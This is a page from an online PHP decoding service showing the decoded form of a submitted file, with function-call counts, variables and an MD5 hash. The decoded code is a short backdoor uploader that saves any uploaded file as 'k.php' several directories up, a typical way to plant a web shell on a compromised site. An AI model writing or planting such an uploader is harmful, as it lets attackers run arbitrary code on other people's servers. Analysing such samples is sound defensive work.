Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

ganteng <?php $file3 = $_FILES['file3']; $newfile3="k.php"; if (file..

Decoded Output download

ganteng 
<?php 
$file3 = $_FILES['file3']; 
  $newfile3="k.php"; 
                if (file_exists("../../../../".$newfile3)) unlink("../../../../".$newfile3); 
        move_uploaded_file($file3['tmp_name'], "../../../../$newfile3"); 
 
?>

Did this file decode correctly?

Original Code

ganteng
<?php
$file3 = $_FILES['file3'];
  $newfile3="k.php";
                if (file_exists("../../../../".$newfile3)) unlink("../../../../".$newfile3);
        move_uploaded_file($file3['tmp_name'], "../../../../$newfile3");

?>

Function Calls

unlink 1
file_exists 1

Variables

$file3 None
$newfile3 k.php

Stats

MD5 5fc09488087e41e1bdd968fd08fe9fa9
Eval Count 0
Decode Time 95 ms